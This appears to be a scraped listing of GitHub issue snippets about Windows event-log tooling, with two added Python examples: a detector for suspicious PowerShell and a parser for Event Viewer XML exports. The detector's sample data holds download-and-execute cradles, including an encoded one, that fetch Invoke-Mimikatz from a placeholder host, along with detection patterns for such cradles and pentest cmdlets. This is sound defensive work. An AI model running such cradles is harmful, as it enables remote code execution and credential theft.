-
Hi do you have any docs on how to use this lib?
Also, any plans to make it dump to xml like evtx_dump.py . Would be pretty handy... TIA!
-
Can we use LogonTracer to monitor logs in a company that generates a 1 GB (300k events) evtx file per hour?
-
Docker cannot delete default event files. Is it possible to perform event initialization?
I was able to successfully import the event, but there …
-
To switch from live log to offline file
https://github.com/bodik/defender/blob/923dbe3120692ec0f29c1924d8d7c3141744d5a5/tools/windows/toolbox/eventlog-services.ps1#L15
`$events = Get-WinEvent -F…
bodik updated
5 years ago
-
Create an analyzer to tag suspicious PowerShell activity to detect things such as a base64 payload, usage of a pen testing framework such as PowerShell empire, etc. The following presentation link giv…
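As an added example (not code from the project or from the issue author), the following Python sketch shows the kind of tagging such an analyzer would do: it scans PowerShell script-block text (event ID 4104 style records), decodes `-EncodedCommand` arguments (base64 of UTF-16LE) and re-scans the decoded payload, flags long base64 runs, download cradles, and a short illustrative list of pentest-framework cmdlet names. The indicator regexes and the sample records are constructed for this example; a real analyzer would carry a maintained indicator list.

```python
import base64
import re
from typing import List, Optional

# Constructed sample ScriptBlockText values (PowerShell event ID 4104 style);
# not real log data. The encoded one is built here so the blob is exact.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/a')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\Users | Select-Object Name"},
    {"EventID": 4104, "ScriptBlockText": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"},
    {"EventID": 4104, "ScriptBlockText":
        "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/Invoke-Mimikatz.ps1')"},
    {"EventID": 4104, "ScriptBlockText": "function Invoke-Empire { param($Server) }"},
]

# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENC_CMD = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Illustrative indicator set (assumption of this example, not a complete list).
RULES = [
    ("download_cradle",
     re.compile(r"\b(iex|invoke-expression)\b.*\b(downloadstring|downloadfile|webclient)\b", re.I)),
    ("pentest_framework",
     re.compile(r"invoke-(empire|mimikatz|shellcode|reflectivepeinjection)|powersploit", re.I)),
    ("base64_payload", re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")),
]


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode an -EncodedCommand argument (base64 of UTF-16LE); None if invalid."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze_script_block(text: str) -> List[str]:
    """Return sorted tags for one script block; the decoded payload is scanned too."""
    tags = set()
    m = ENC_CMD.search(text)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None:
            tags.add("encoded_command")
            # Recurse so cradles hidden behind -Enc get the same rules applied.
            tags.update(analyze_script_block(decoded))
    for name, pattern in RULES:
        if pattern.search(text):
            tags.add(name)
    return sorted(tags)


def analyze_events(events) -> List[dict]:
    """Tag every 4104 record that trips at least one rule."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        tags = analyze_script_block(ev.get("ScriptBlockText", ""))
        if tags:
            findings.append({"EventID": 4104, "tags": tags,
                             "snippet": ev["ScriptBlockText"][:60]})
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f["tags"], f["snippet"])
```

The recursion into the decoded payload is the part that matters in practice: the cradle in the second sample is invisible to the cleartext rules until `-Enc` is decoded, and a plain base64 run on its own is only a weak signal worth a lower-priority tag.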
-
> flannel version
C:\opt\bin\rancher-wins-flanneld.exe --version
- label container log names
- grab evtx files in addition to json
- refactor
- better organize directories (top-level d…
-
Hi,
When providing an evtx to the software, the nodes of the parent processes do not necessarily have a name because it is not specified in the transformer. This patch is used to display it.
![n…
-
I saw that the csv-timeline and json-timeline commands support deduplication using the flag `--remove-duplicate-detections`. I think that is incredibly useful. Unfortunately the logon-summary does not…
-
**Note that Windows Event Log XML output (as exported by Windows EventViewer) is not necessarily proper XML.** Also see: https://github.com/dfirlabs/evtx-specimens and https://github.com/log2timeline/pl…
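As an added example (not the project's code), the following Python snippet handles one concrete way such an export fails to be a well-formed document: the file is a sequence of top-level `<Event>` elements with no single root, optionally preceded by a BOM or an XML declaration, which a strict parser rejects with "junk after document element". The fix is to strip the prologue and wrap the sequence in a synthetic root before parsing. The sample export is constructed for this example; other defects (stray control characters, truncated events) are not covered here.

```python
import re
import xml.etree.ElementTree as ET
from typing import List

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = {"e": EVT_NS}
XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")

# Constructed sample modelled on an Event Viewer "Save As XML" export:
# two top-level <Event> elements, no root element, leading BOM. Not real data.
SAMPLE_EXPORT = (
    "\ufeff"
    f'<Event xmlns="{EVT_NS}">'
    "<System><Provider Name='Microsoft-Windows-Security-Auditing'/>"
    "<EventID>4624</EventID><Computer>WS01.example.local</Computer></System>"
    "<EventData><Data Name='TargetUserName'>alice</Data>"
    "<Data Name='LogonType'>10</Data></EventData>"
    "</Event>\n"
    f'<Event xmlns="{EVT_NS}">'
    "<System><Provider Name='Microsoft-Windows-Security-Auditing'/>"
    "<EventID>4625</EventID><Computer>WS01.example.local</Computer></System>"
    "<EventData><Data Name='TargetUserName'>bob</Data>"
    "<Data Name='LogonType'>3</Data></EventData>"
    "</Event>\n"
)


def is_well_formed(text: str) -> bool:
    """Strict check: True only if the whole text is a single XML document."""
    try:
        ET.fromstring(text.lstrip("\ufeff"))
        return True
    except ET.ParseError:
        return False


def parse_eventviewer_xml(text: str) -> List[dict]:
    """Parse a root-less Event Viewer export by wrapping it in a synthetic root."""
    body = XML_DECL.sub("", text.lstrip("\ufeff"), count=1)
    root = ET.fromstring(f"<Events>{body}</Events>")
    events = []
    for ev in root.findall("e:Event", NS):
        system = ev.find("e:System", NS)
        rec = {
            "EventID": int(system.findtext("e:EventID", default="0", namespaces=NS)),
            "Computer": system.findtext("e:Computer", default="", namespaces=NS),
            "Data": {},
        }
        # EventData/Data elements are keyed by their Name attribute.
        for d in ev.findall("e:EventData/e:Data", NS):
            rec["Data"][d.get("Name", "")] = (d.text or "").strip()
        events.append(rec)
    return events


if __name__ == "__main__":
    print("well-formed:", is_well_formed(SAMPLE_EXPORT))
    for rec in parse_eventviewer_xml(SAMPLE_EXPORT):
        print(rec["EventID"], rec["Computer"], rec["Data"])
```

Keep the strict check around as a guard: if an export does parse as a single document, the wrapper is harmless, and if it fails for a reason other than the missing root, the wrapped parse will still raise and point at the real defect rather than silently dropping events.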